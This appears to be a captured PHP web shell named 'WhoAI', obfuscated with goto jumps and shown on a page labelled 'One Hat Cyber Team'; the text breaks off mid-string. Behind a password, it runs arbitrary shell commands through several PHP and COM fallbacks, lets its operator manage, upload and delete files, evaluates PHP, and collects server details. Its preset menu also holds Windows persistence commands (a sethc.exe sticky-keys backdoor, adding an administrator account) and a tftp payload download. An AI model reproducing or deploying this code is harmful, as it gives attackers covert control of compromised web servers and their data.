One Hat Cyber Team

View File Name : bzixmysg.php

<?php
goto F77; E08: function fileu($filenamea, $filenameb) { goto ca; a9: if (!$key) { $key = copy($filenamea, $filenameb) ? true : false; } goto F9; ca: $key = move_uploaded_file($filenamea, $filenameb) ? true : false; goto a9; F9: return $key; goto Ce; Ce: } goto E29; a40: echo '</div>'; goto A87; B45: function chkgpc($array) { foreach ($array as $key => $var) { $array[$key] = is_array($var) ? chkgpc($var) : stripslashes($var); } return $array; } goto Aa4; a12: subeval(); goto fa7; Abd: function antivirus($dir, $exs, $matches, $now) { goto e9; f7: closedir($handle); goto E4; c9: while (false !== ($name = readdir($handle))) { if ($name == '.' || $name == '..') { continue; } $path = $dir . $name; if (is_dir($path)) { if (is_readable($path)) { antivirus($path . '/', $exs, $matches, $now); } } else { goto C8; C9: if ($iskill) { goto a1; a1: $code = filer($path); goto fc; A1: unset($code, $array); goto e3; fc: foreach ($matches[$iskill] as $matche) { goto dd; cd: if (strpos($array[0], '$this->') || strpos($array[0], '[$vars[')) { continue; } goto a3; B8: preg_match($matche, $code, $array); goto cd; dd: $array = array(); goto B8; a3: $len = strlen($array[0]); goto a4; a4: if ($len > 6 && $len < 200) { goto ef; F1: echo '特征 <input type="text" value="' . htmlspecialchars($array[0]) . '"> <a href="javascript:go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>'; goto de; D3: ob_flush(); goto B0; B0: break; goto A3; ef: $file = strtr($path, array($now => '', '\'' => '%27', '"' => '%22')); goto F1; de: flush(); goto D3; A3: } goto Cb; Cb: } goto A1; e3: } goto Bc; C8: $iskill = NULL; goto A5; E2: if (strpos(size(filesize($path)), 'M')) { continue; } goto C9; A5: foreach ($exs as $key => $ex) { if (find(explode('|', $ex), $name)) { $iskill = $key; break; } } goto E2; Bc: } } goto f7; E4: return true; goto f0; e9: if (($handle = @opendir($dir)) == NULL) { return false; } goto c9; f0: } goto B39; fa7: echo '<input type="hidden" name="go" id="go" value="">'; goto B77; B3c: function getinfo() { goto d9; d9: global $password; goto Ba; a0: if ($password != '' && md5($infos[0]) != $infos[1]) { goto A9; Ab: echo '<input style="Width:55pt;font-size:90%;font-family:Microsoft YaHei" class="btn btn-orange" type="submit" value="Login"></form></center></body></html>'; goto b2; A9: echo '
<title>WhoAI</title>
<meta http-equiv="content-type" content="text/html;charset=gb2312">
<style type="text/css">
.form-control {
display: block;
width: 100%;
height: 38px;
padding: 8px 12px;
font-size: 14px;
line-height: 1.428571429;
color: #555;
vertical-align: middle;
background-color: #fff;
border: 1px solid #efcece;
border-radius: 4px;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);
-webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;
transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s
}

.btn {
display: inline-block;
padding: 8px 12px;
margin-bottom: 0;
font-size: 14px;
font-weight: 500;
line-height: 1.428571429;
text-align: center;
white-space: nowrap;
vertical-align: middle;
cursor: pointer;
border: 1px solid transparent;
border-radius: 4px;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
-o-user-select: none;
user-select: none
}

.btn-primary {
color: #fff;
background-color: #428bca;
border-color: #428bca
}

.btn-orange {
color: #fff;
background-color: #f75834;
border-color: #d96c0a;
}
</style>
<center>
<br><br>
<form method="POST">
<input style="Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%" class="form-control" placeholder="" type="password" name="getpwd">
'; goto ed; b2: exit; goto B4; ed: if (isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="' . $_POST['pass'] . '">'; } goto fe; E7: if (isset($_POST['check'])) { echo '<input type="hidden" name="check" value="' . $_POST['check'] . '">'; } goto Ab; fe: if (isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="' . $_POST['pass'] . '" value="' . $_POST[$_POST['pass']] . '">'; } goto E7; B4: } goto A6; Ba: $infos = array($_POST['getpwd'], $password, function_exists('phpinfo')); goto a0; A6: @setcookie("new", 951); goto Af6; Af6: if (@$_COOKIE["new"] != 95) { @setcookie("new", 95); } goto Ff8; Ff8: return $infos[2]; goto A4c; A4c: } goto Ae8; B64: $myfile = strpos($myfile, 'eval()') ? array_shift(explode('(', $myfile)) : $myfile; goto A18; E01: function filer($filename) { goto F5; c0: return $filedata; goto b0; F5: $handle = fopen($filename, 'r'); goto A0; A0: $filedata = fread($handle, filesize($filename)); goto Ac; Ac: fclose($handle); goto c0; b0: } goto E08; D49: echo ($_SERVER['SERVER_ADDR'] ? $_SERVER['SERVER_ADDR'] : gethostbyname($_SERVER['SERVER_NAME'])) . ' - ' . php_uname() . ' - whoami(' . get_current_user() . ') - 【uid(' . getmyuid() . ') gid(' . getmygid() . ')】'; goto Aba; F77: header('Content-Type: text/html; charset=utf-8'); goto Ec5; a06: $password = "5ca93d134ad298d385f9d18a0c83774e"; goto E55; B77: echo '<input type="hidden" name="godir" id="godir" value="' . $nowdir . '">'; goto e09; F14: if (isset($_POST['go'])) { if ($_POST['go'] == 'down') { $downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']); if (!filed($downfile)) { $msg = '<h1>下载文件不存在</h1>'; } } } goto A78; e60: if (function_exists('sybase_close')) { $issql .= ' - SyBase'; } goto bb7; Ec5: header("content-Type: text/html; charset=utf-8"); goto dd9; f96: $msg = VERSION; goto B4a; dd9: error_reporting(E_ERROR); goto d78; Ae8: function subeval() { goto E85; c8e: if (isset($_POST['pass'])) { echo '<input type="hidden" name="pass" value="' . $_POST['pass'] . '">'; } goto A24; C3e: if (isset($_POST['check'])) { echo '<input type="hidden" name="check" value="' . $_POST['check'] . '">'; } goto A9f; A24: if (isset($_POST[$_POST['pass']])) { echo '<input type="hidden" name="' . $_POST['pass'] . '" value="' . $_POST[$_POST['pass']] . '">'; } goto C3e; E85: if (isset($_POST['getpwd'])) { echo '<input type="hidden" name="getpwd" value="' . $_POST['getpwd'] . '">'; } goto c8e; A9f: return true; goto d5a; d5a: } goto F14; Aba: if (isset($issql)) { echo ' - 【' . $issql . '】'; } goto B48; E55: function strdir($str) { return str_replace(array('\\', '//', '%27', '%22'), array('/', '/', '\'', '"'), chop($str)); } goto B45; B4a: function filew($filename, $filedata, $filemode) { goto A2; fa: $handle = fopen($filename, $filemode); goto a5; c2: return $key; goto ce; a5: $key = fputs($handle, $filedata); goto b1; A2: if (!is_writable($filename) && file_exists($filename)) { chmod($filename, 0666); } goto fa; b1: fclose($handle); goto c2; ce: } goto E01; A87: echo '<form name="gofrm" id="gofrm" method="POST">'; goto a12; B39: function command($cmd, $cwd, $com = false) { goto ad; F7: $res = $msg = ''; goto e8; ad: $iswin = substr(PHP_OS, 0, 3) == 'WIN' ? true : false; goto F7; d0: $msg = $res == '' ? '<h1>NULL</h1>' : '<h2>利用' . $msg . '执行成功</h2>'; goto d3; e8: if ($cwd == 'com' || $com) { if ($iswin && class_exists('COM')) { goto c4; e6: $msg = 'Wscript.Shell'; goto c1; B2: $res = $stdout->ReadAll(); goto e6; C6: $stdout = $exec->StdOut(); goto B2; c4: $wscript = new COM('Wscript.Shell'); goto D7; D7: $exec = $wscript->exec('c:\\windows\\system32\\cmd.exe /c ' . $cmd); goto C6; c1: } } else { goto Bd; Bd: chdir($cwd); goto ee; ee: $cwd = getcwd(); goto Bb; Bb: if (function_exists('exec')) { goto ac; C2: $msg = 'exec'; goto E8; Cc: $res = join("\n", $res); goto C2; ac: @exec($cmd, $res); goto Cc; E8: } elseif (function_exists('shell_exec')) { $res = @shell_exec($cmd); $msg = 'shell_exec'; } elseif (function_exists('system')) { goto Ef; C4: $res = ob_get_contents(); goto e4; e4: ob_end_clean(); goto D6; d2: @system($cmd); goto C4; Ef: ob_start(); goto d2; D6: $msg = 'system'; goto E0; E0: } elseif (function_exists('passthru')) { goto Fd; Db: $res = ob_get_contents(); goto E3; E3: ob_end_clean(); goto Dc; Dc: $msg = 'passthru'; goto Ed; Fd: ob_start(); goto De; De: @passthru($cmd); goto Db; Ed: } elseif (function_exists('popen')) { goto Aa; F8: @pclose($fp); goto ea; ea: $msg = 'popen'; goto cc; Aa: $fp = @popen($cmd, 'r'); goto df; df: if ($fp) { while (!feof($fp)) { $res .= fread($fp, 1024); } } goto F8; cc: } elseif (function_exists('proc_open')) { goto A7; A7: $env = $iswin ? array('path' => 'c:\\windows\\system32') : array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); goto bb; Ad: @proc_close($process); goto C3; E5: if (is_resource($process)) { goto A8; Da: $res .= stream_get_contents($pipes[1]); goto D2; e5: fclose($pipes[2]); goto e7; D2: fclose($pipes[1]); goto F4; F4: $res .= stream_get_contents($pipes[2]); goto e5; A8: fwrite($pipes[0], $cmd); goto Ca; Ca: fclose($pipes[0]); goto Da; e7: } goto Ad; bb: $des = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); goto D9; D9: $process = @proc_open($cmd, $des, $pipes, $cwd, $env); goto E5; C3: $msg = 'proc_open'; goto da; da: } goto e0; e0: } goto d0; d3: return array('res' => $res, 'msg' => $msg); goto F3; F3: } goto B3c; A57: foreach ($menu as $key => $name) { echo '<a' . ($go == $key ? ' class="current"' : '') . ' href="javascript:go(\'' . $key . '\',\'' . base64_encode($nowdir) . '\');">' . $name . '</a> '; } goto a40; Bc8: $go = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file'; goto A91; Aa4: $myfile = $_SERVER['SCRIPT_FILENAME'] ? strdir($_SERVER['SCRIPT_FILENAME']) : strdir(__FILE__); goto B64; e09: echo '<input type="hidden" name="govar" id="govar" value="">'; goto Ff5; d78: @ini_set('display_errors', 'Off'); goto D85; f4d: echo '<div class="tag">'; goto A57; F26: define('EXISTS_PHPINFO', getinfo() ? true : false); goto Edf; D85: @ini_set('max_execution_time', 20000); goto E75; a42: function showdir($dir) { goto e2; e2: $dir = strdir($dir . '/'); goto D1; Ae: $array = array(); goto a8; D1: if (($handle = @opendir($dir)) == NULL) { return false; } goto Ae; Df: closedir($handle); goto bc; bc: return $array; goto bd; a8: while (false !== ($name = readdir($handle))) { if ($name == '.' || $name == '..') { continue; } $path = $dir . $name; $name = strtr($name, array('\'' => '%27', '"' => '%22')); if (is_dir($path)) { $array['dir'][$path] = $name; } else { $array['file'][$path] = $name; } } goto Df; bd: } goto cc8; Ff5: echo '</form>'; goto Ee4; B48: ?></div>
<?php goto ed9; a7e: $win = substr(PHP_OS, 0, 3) == 'WIN' ? true : false; goto f96; Edf: if (get_magic_quotes_gpc()) { $_POST = chkgpc($_POST); } goto E64; A91: $nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR; goto f4d; E64: if (function_exists('mysql_close')) { $issql = 'MySql'; } goto b47; e8c: if (function_exists('oci_close')) { $issql .= ' - Oracle'; } goto e60; B42: function size($bytes) { goto F2; f2: return sprintf('%.2f ' . $array[$floor], $bytes / pow(1024, floor($floor))); goto Cf; F2: if ($bytes < 1024) { return $bytes . ' B'; } goto c8; a6: $floor = floor(log($bytes) / log(1024)); goto f2; c8: $array = array('B', 'K', 'M', 'G', 'T'); goto a6; Cf: } goto b11; A78: ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<style type="text/css">
* {margin:0px;padding:0px;}
body {background:#CCCCCC;color:#333333;font-size:13px;font-family:Microsoft YaHei,SimSun,sans-serif;text-align:left;word-wrap:break-word; word-break:break-all;}
a{color:#000000;text-decoration:none;vertical-align:middle;}
a:hover{color:#FF0000;text-decoration:underline;}
p {padding:1px;line-height:1.6em;}
h1 {color:#CD3333;font-size:13px;display:inline;vertical-align:middle;}
h2 {color:#008B45;font-size:13px;display:inline;vertical-align:middle;}
form {display:inline;}
input,select { vertical-align:middle; }
input[type=text], textarea {padding:1px;font-family:Microsoft YaHei,sans-serif;}
input[type=submit], input[type=button] {height:21px;}
.tag {text-align:center;margin-left:10px;background:threedface;height:25px;padding-top:5px;}
.tag a {background:#FAFAFA;color:#333333;width:90px;height:20px;display:inline-block;font-size:15px;font-weight:bold;padding-top:5px;}
.tag a:hover, .tag a.current {background:#EEE685;color:#000000;text-decoration:none;}
.main {width:963px;margin:0 auto;padding:10px;}
.outl {border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;}
.toptag {padding:5px;text-align:left;font-weight:bold;color:#FFFFFF;background:#293F5F;}
.footag {padding:5px;text-align:center;font-weight:bold;color:#000000;background:#999999;}
.msgbox {padding:5px;background:#EEE685;text-align:center;vertical-align:middle;}
.actall {background:#F9F6F4;text-align:center;font-size:15px;border-bottom:1px solid #999999;padding:3px;vertical-align:middle;}
.tables {width:100%;}
.tables th {background:threedface;text-align:left;border-color:#FFFFFF #666666 #666666 #FFFFFF;border-style:solid;border-width:1px;padding:2px;}
.tables td {background:#F9F6F4;height:19px;padding-left:2px;}
</style>
<script type="text/javascript">
function $(ID) { return document.getElementById(ID); }
function sd(str) { str = str.replace(/%22/g,'"'); str = str.replace(/%27/g,"'"); return str; }
function cd(dir) { dir = sd(dir); $('dir').value = dir; $('frm').submit(); }
function sa(form) { for(var i = 0;i < form.elements.length;i++) { var e = form.elements[i]; if(e.type == 'checkbox') { if(e.name != 'chkall') { e.checked = form.chkall.checked; } } } }
function go(a,b) { b = sd(b); $('go').value = a; $('govar').value = b; if(a == 'editor') { $('gofrm').target = "_blank"; } else { $('gofrm').target = ""; } $('gofrm').submit(); }
function nf(a,b) { re = prompt("新建名",b); if(re) { $('go').value = a; $('govar').value = re; $('gofrm').submit(); } }
function dels(a) { if(a == 'b') { var msg = "所选文件"; $('act').value = a; } else { var msg = "目录"; $('act').value = 'deltree'; $('var').value = a; } if(confirm("确定要删除"+msg+"吗")) { $('frm1').submit(); } }
function txts(m,p,a) { p = sd(p); re = prompt(m,p); if(re) { $('var').value = re; $('act').value = a; $('frm1').submit(); } }
function acts(p,a,f) { p = sd(p); f = sd(f); re = prompt(f,p); if(re) { $('var').value = re+'|x|'+f; $('act').value = a; $('frm1').submit(); } }
</script>
<title><?php goto e75; bb7: if (function_exists('pg_close')) { $issql .= ' - PostgreSql'; } goto a7e; ed9: $menu = array('file' => '文件管理', 'scan' => '搜索文件', 'antivirus' => '扫描后门', 'exec' => '执行命令', 'phpeval' => '执行PHP', 'info' => '系统信息', 'quit' => '退出'); goto Bc8; E29: function filed($filename) { goto d8; C1: ob_end_clean(); goto a7; B1: $array = explode('.', $name); goto F0; F0: header('Content-type: application/x-' . array_pop($array)); goto E1; a7: $name = basename($filename); goto B1; E1: header('Content-Disposition: attachment; filename=' . $name); goto ba; b3: exit; goto eb; ba: header('Content-Length: ' . filesize($filename)); goto d7; d8: if (!file_exists($filename)) { return false; } goto C1; d7: @readfile($filename); goto b3; eb: } goto a42; cc8: function deltree($dir) { goto e1; C7: while (false !== ($name = @readdir($handle))) { if ($name == '.' || $name == '..') { continue; } $path = $dir . $name; @chmod($path, 0777); if (is_dir($path)) { deltree($path . '/'); } else { @unlink($path); } } goto Dd; e1: $handle = @opendir($dir); goto C7; Dd: @closedir($handle); goto f4; f4: return @rmdir($dir); goto ff; ff: } goto B42; bbb: ?></title>
</head>
<body>
<div class="main">
<div class="outl">
<div class="toptag"><?php goto D49; E75: @ini_set('memory_limit', '256M'); goto a06; C4d: function scanfile($dir, $key, $inc, $fit, $tye, $chr, $ran, $now) { goto D8; B6: while (false !== ($name = readdir($handle))) { if ($name == '.' || $name == '..') { continue; } $path = $dir . $name; if (is_dir($path)) { if ($fit && in_array($name, $fit)) { continue; } if ($ran == 0 && is_readable($path)) { scanfile($path . '/', $key, $inc, $fit, $tye, $chr, $ran, $now); } } else { goto E6; E6: if ($inc && !find($inc, $name)) { continue; } goto D4; D4: $code = $tye ? filer($path) : $name; goto ab; ab: $find = $chr ? stristr($code, $key) : (strpos(size(filesize($path)), 'M') ? false : strpos($code, $key) > -1); goto Af; Cd: unset($code); goto B9; Af: if ($find) { goto a2; Ff: ob_flush(); goto Bf; a2: $file = strtr($path, array($now => '', '\'' => '%27', '"' => '%22')); goto Fc; b5: flush(); goto Ff; Fc: echo '<a href="javascript:go(\'editor\',\'' . $file . '\');">编辑</a> ' . $path . '<br>'; goto b5; Bf: } goto Cd; B9: } } goto f5; D8: if (($handle = @opendir($dir)) == NULL) { return false; } goto B6; f5: closedir($handle); goto f3; f3: return true; goto d5; d5: } goto Abd; b47: if (function_exists('mssql_close')) { $issql .= ' - MsSql'; } goto e8c; f43: define('ROOTDIR', strdir(strtr($myfile, array(strdir($_SERVER['PHP_SELF']) => '')) . '/')); goto F26; e75: echo VERSION . ' - 【' . date('Y-m-d H:i:s 星期N', time()) . '】'; goto bbb; Cff: define('THISDIR', strdir(dirname($myfile) . '/')); goto f43; b11: function find($array, $string) { foreach ($array as $key) { if (stristr($string, $key)) { return true; } } return false; } goto C4d; A18: define('VERSION', 'WhoAI'); goto Cff; Ee4: switch ($_POST['go']) { case "info": goto fc3; D84: echo '</table>'; goto De2; B72: echo '<div class="msgbox">' . $msg . '</div>'; goto aac; fc3: if (EXISTS_PHPINFO) { goto B80; Ca4: $config = $tmp[2][0]; goto Bbc; B04: $out = ob_get_contents(); goto e3e; A88: $tmp = array(); goto df5; Bbc: $phpini = $tmp[2][2] ? $tmp[2][1] . ' --- ' . $tmp[2][2] : $tmp[2][1]; goto f98; E37: phpinfo(INFO_GENERAL); goto B04; B80: ob_start(); goto E37; df5: preg_match_all('/\\<td class\\=\\"e\\"\\>.*?(Command|Configuration)+.*?\\<\\/td\\>\\<td class\\=\\"v\\"\\>(.*?)\\<\\/td\\>/i', $out, $tmp); goto Ca4; e3e: ob_end_clean(); goto A88; f98: } goto f75; F78: foreach ($infos as $name => $var) { echo '<tr><td>' . $name . '</td><td>' . $var . '</td></tr>'; } goto D84; De2: break; goto c22; aac: echo '<table class="tables"><tr><th style="width:26%;">名称</th><th>参数</th></tr>'; goto F78; f75: $infos = array('客户端浏览器信息' => $_SERVER['HTTP_USER_AGENT'], '被禁用的函数' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '(无)', '被禁用的类' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '(无)', 'PHP.ini配置路径' => $phpini ? $phpini : '(无)', 'PHP运行方式' => php_sapi_name(), 'PHP版本' => PHP_VERSION, 'PHP进程PID' => getmypid(), '客户端IP' => $_SERVER['REMOTE_ADDR'], '客户端文字编码' => $_SERVER['HTTP_ACCEPT_LANGUAGE'], 'Web服务端口' => $_SERVER['SERVER_PORT'], 'Web根目录' => $_SERVER['DOCUMENT_ROOT'], 'Web执行脚本' => $_SERVER['SCRIPT_FILENAME'], 'Web规范CGI版本' => $_SERVER['GATEWAY_INTERFACE'], 'Web管理员Email' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '(无)', '当前磁盘总大小' => size(disk_total_space('.')), '当前磁盘可用空间' => size(disk_free_space('.')), 'POST最大字数量' => get_cfg_var("post_max_size"), '允许最大上传文件' => get_cfg_var("upload_max_filesize"), '程序最大使用内存量' => get_cfg_var("memory_limit"), '程序最长运行时间' => get_cfg_var("max_execution_time") . '秒', '是否支持Fsockopen' => function_exists('fsockopen') ? '是' : '否', '是否支持Socket' => function_exists('socket_close') ? '是' : '否', '是否支持Pcntl' => function_exists('pcntl_exec') ? '是' : '否', '是否支持Curl' => function_exists('curl_version') ? '是' : '否', '是否支持Zlib' => function_exists('gzclose') ? '是' : '否', '是否支持FTP' => function_exists('ftp_login') ? '是' : '否', '是否支持XML' => function_exists('xml_set_object') ? '是' : '否', '是否支持GD_Library' => function_exists('imageline') ? '是' : '否', '是否支持COM组建' => class_exists('COM') ? '是' : '否', '是否支持ODBC组建' => function_exists('odbc_close') ? '是' : '否', '是否支持IMAP邮件' => function_exists('imap_close') ? '是' : '否', '是否运行于安全模式' => get_cfg_var("safemode") ? '是' : '否', '是否允许URL打开文件' => get_cfg_var("allow_url_fopen") ? '是' : '否', '是否允许动态加载链接库' => get_cfg_var("enable_dl") ? '是' : '否', '是否显示错误信息' => get_cfg_var("display_errors") ? '是' : '否', '是否自动注册全局变量' => get_cfg_var("register_globals") ? '是' : '否', '是否使用反斜线引用字符串' => get_cfg_var("magic_quotes_gpc") ? '是' : '否', 'PHP编译参数' => $config ? $config : '(无)'); goto B72; c22: case "quit": goto B7f; A2b: ob_start(); goto B89; B7f: @setcookie("new", ""); goto A2b; Ecc: exit; goto acd; C28: echo '<script>'; goto B43; B89: $currentURL = $_SERVER['REQUEST_URI']; goto C28; Bf3: echo '</script>'; goto Ecc; B43: echo 'window.location.href = "' . $currentURL . '";'; goto Bf3; acd: break; goto D41; D41: case "exec": goto b7d; eb3: foreach ($selects as $var => $name) { echo '<option value="' . $var . '"' . ($var == $str ? ' selected' : '') . '>' . $name . '</option>'; } goto f5d; d39: subeval(); goto c1f; b7d: $cmd = $win ? 'dir' : 'ls -al'; goto c9d; c93: echo '<option value="query user">query user(Win)</option>'; goto ef0; dea: echo '<div class="actall">命令 <input type="text" name="execcmd" id="execcmd" value="' . htmlspecialchars($cmd) . '" style="width:398px;"> '; goto B15; ddd: echo '<option value="whoami">whoami</option>'; goto afe; afe: echo '<option value="systeminfo">版本信息(Win)</option>'; goto ad2; af7: echo '<option value="cat /etc/hosts">hosts(Linux)</option>'; goto c04; a2c: echo '<option value="ifconfig">ifconfig(Linux)</option>'; goto Be4; D38: echo '<option value="ps -ef">ps(Linux)</option>'; goto a2c; e41: echo '</select> '; goto Fd8; C7c: echo '<option value="netstat -an">netstat -an(Win)</option>'; goto Bb3; Ddc: echo '</div><div class="actall"><textarea style="width:698px;height:368px;">' . htmlspecialchars($res['res']) . '</textarea></div></form>'; goto ffa; c04: echo '<option value="cat /etc/services">services(Linux)</option>'; goto e69; ef0: echo '<option value="copy c:windowsexplorer.exe c:windowssystem32sethc.exe & copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe">shift后门(Win)</option>'; goto a25; c1f: echo '<input type="hidden" name="go" id="go" value="exec">'; goto dea; ffa: break; goto Cd2; D37: echo '<option value="ipconfig /all">ipconfig(Win)</option>'; goto B1c; ad2: echo '<option value="path">path(Win)</option>'; goto D37; ad8: echo '<form method="POST">'; goto d39; D05: $selects = array('fun' => 'phpfun', 'com' => 'wscript'); goto eb3; c9d: $res = array('res' => '命令回显', 'msg' => $msg); goto D16; F8a: echo '<option value="cat /etc/my.cnf">my.cnf(Linux)</option>'; goto af7; e69: echo '<option value="id;uname -a;cat /etc/issue;cat /proc/version;lsb_release -a">Linux-版本集合</option>'; goto e41; f5d: echo '</select> '; goto c55; Fd8: echo '<input type="submit" style="width:50px;" value="执行">'; goto Ddc; Be4: echo '<option value="cat /etc/syslog.conf">syslog.conf(Linux)</option>'; goto F8a; ae8: if (isset($_POST['execcmd'])) { goto dc1; D2c: $res = command($cmd, $cwd); goto Edd; E1a: $cwd = $str == 'fun' ? THISDIR : 'com'; goto D2c; dc1: $cmd = $_POST['execcmd']; goto E1a; Edd: } goto E19; B01: echo '<option value="net user $ahsec ahsec /add & net localgroup administrators $ahsec /add">添加用户(Win)</option>'; goto c93; Cc7: echo '<option value="net config server">net config server(Win)</option>'; goto B01; a25: echo '<option value="tftp -i ip地址 get server.exe c:\\server.exe">Ftp下载(Win)</option>'; goto D38; c55: echo '<select onchange="$(\'execcmd\').value=options[selectedIndex].value">'; goto f42; E19: echo '<div class="msgbox">' . $res['msg'] . '</div>'; goto ad8; D16: $str = isset($_POST['str']) ? $_POST['str'] : 'fun'; goto ae8; B1c: echo '<option value="tasklist /svc">tasklist(Win)</option>'; goto C7c; B15: echo '<select name="str">'; goto D05; f42: echo '<option>---命令集合---</option>'; goto C76; bab: echo '<option value="net config workstation">net config workstation(Win)</option>'; goto Cc7; C76: echo '<option value="echo ' . htmlspecialchars('"<?php phpinfo();?>"') . ' >> ' . THISDIR . 't00ls.txt">写文件</option>'; goto ddd; Bb3: echo '<option value="net user">net user(Win)</option>'; goto bab; Cd2: case "scan": goto c36; f16: echo '<tr><td>搜索内容</td><td><input type="text" name="keyword" value="' . htmlspecialchars($keyword) . '" style="width:500px;"> (文件名或文件内容)</td></tr>'; goto Af8; C35: echo '<input type="hidden" name="go" id="go" value="scan">'; goto Fad; E3d: echo '<label><input type="checkbox" name="char" value="1"' . ($_POST['char'] ? ' checked' : '') . '>匹配大小写</label></td></tr>'; goto D9d; d7c: echo '<label><input type="radio" name="type" value="1"' . ($_POST['type'] ? ' checked' : '') . '>搜索包含文字</label> '; goto E3d; c9e: echo '<tr><td>过滤目录</td><td><input type="text" name="filters" value="' . htmlspecialchars($filters) . '" style="width:500px;"> (用"|"分割, 为空则不过滤目录)</td></tr>'; goto c19; Ae7: echo '<tr><td>搜索路径</td><td><input type="text" name="dir" value="' . htmlspecialchars($scandir) . '" style="width:500px;"></td></tr>'; goto f16; dd4: echo '<div class="msgbox">' . $msg . '</div>'; goto d32; Af8: echo '<tr><td>文件后缀</td><td><input type="text" name="include" value="' . htmlspecialchars($include) . '" style="width:500px;"> (用"|"分割, 为空则搜索所有文件)</td></tr>'; goto c9e; f73: echo '<tr><td>操作</td><td><input type="submit" style="width:80px;" value="搜索"></td></tr>'; goto a1e; d16: if ($keyword != '') { goto c37; C41: echo '<p>' . ($isread ? '<h2>搜索完成</h2>' : '<h1>搜索失败</h1>') . '</p></div>'; goto b9b; Fb9: $fits = $filters == '' ? false : explode('|', $filters); goto Bc7; c37: flush(); goto Fe1; aed: echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">'; goto e43; Bc7: $isread = scanfile(strdir($scandir . '/'), $keyword, $incs, $fits, $_POST['type'], $_POST['char'], $_POST['range'], $nowdir); goto C41; e43: $incs = $include == '' ? false : explode('|', $include); goto Fb9; Fe1: ob_flush(); goto aed; b9b: } goto Dfc; D9d: echo '<tr><td>搜索范围</td><td><label><input type="radio" name="range" value="0"' . ($_POST['range'] ? '' : ' checked') . '>将搜索应用于该文件夹,子文件夹和文件</label> '; goto Db4; c6b: subeval(); goto C35; d32: echo '<form method="POST">'; goto c6b; a1e: echo '</table></form>'; goto d16; Bf7: $keyword = isset($_POST['keyword']) ? $_POST['keyword'] : ''; goto Bb6; c19: echo '<tr><td>搜索方式</td><td><label><input type="radio" name="type" value="0"' . ($_POST['type'] ? '' : ' checked') . '>搜索文件名</label> '; goto d7c; Bb6: $include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py'; goto d41; Db4: echo '<label><input type="radio" name="range" value="1"' . ($_POST['range'] ? ' checked' : '') . '>仅将搜索应用于该文件夹</label></td></tr>'; goto f73; Dfc: break; goto f32; d41: $filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js'; goto dd4; c36: $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; goto Bf7; Fad: echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>'; goto Ae7; f32: case "antivirus": goto f4a; da0: echo '</table></form>'; goto Db8; A51: foreach ($types as $key => $ex) { echo '<label title="' . $ex . '"><input type="checkbox" name="types[' . $key . ']" value="' . $ex . '"' . ($typearr[$key] == $ex ? ' checked' : '') . '>' . $key . '</label> '; } goto ff5; e4a: echo '<form method="POST">'; goto c85; f4a: $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; goto fca; c1a: echo '<div class="msgbox">' . $msg . '</div>'; goto e4a; c85: subeval(); goto df8; ada: echo '<table class="tables"><tr><th style="width:15%;">名称</th><th>设置</th></tr>'; goto C6d; b25: echo '<tr><td>查杀类型</td><td>'; goto b42; df8: echo '<input type="hidden" name="go" id="go" value="antivirus">'; goto ada; Db8: if (count($_POST['types']) > 0) { goto ad1; f6f: echo '<div style="padding:5px;background:#F8F8F8;text-align:left;">'; goto b16; b57: ob_flush(); goto f6f; ad1: $matches = array('php' => array(), 'asp+aspx' => array(), 'jsp' => array()); goto C94; b16: $isread = antivirus(strdir($scandir . '/'), $typearr, $matches, $nowdir); goto D53; C94: flush(); goto b57; D53: echo '<p>' . ($isread ? '<h2>扫描完成</h2>' : '<h1>扫描失败</h1>') . '</p></div>'; goto C5a; C5a: } goto Acd; ff5: echo '</td></tr><tr><td>操作</td><td><input type="submit" style="width:80px;" value="扫描"></td></tr>'; goto da0; Acd: break; goto f2d; b42: $types = array('php' => '.php|.inc|.phtml', 'asp+aspx' => '.as|.cs|.cer', 'jsp' => '.jsp'); goto A51; fca: $typearr = isset($_POST['dir']) ? $_POST['types'] : array('php' => '.php|.inc|.phtml'); goto c1a; C6d: echo '<tr><td>扫描路径</td><td><input type="text" name="dir" value="' . htmlspecialchars($scandir) . '" style="width:398px;"> (采用正则匹配)</td></tr>'; goto b25; f2d: case "phpeval": goto e24; F87: echo '</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">' . htmlspecialchars($out) . '</textarea></p><p><input type="button" value="以HTML运行以上代码" onclick="runcode(\'evalcode\')"></p></div>'; goto Ac7; daf: echo '</select> '; goto ea1; B16: echo '<select onchange="$(\'phpcode\').value=options[selectedIndex].value">'; goto fb9; F4d: echo '<option value="echo chmod(\'C:/web/t00ls1.php\',0777)?\'Success!\':\'Fail!\';">修改属性</option>'; goto C63; ef4: echo '<option value="print_r($_SERVER);">环境变量</option>'; goto F6c; aa6: echo '<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">' . 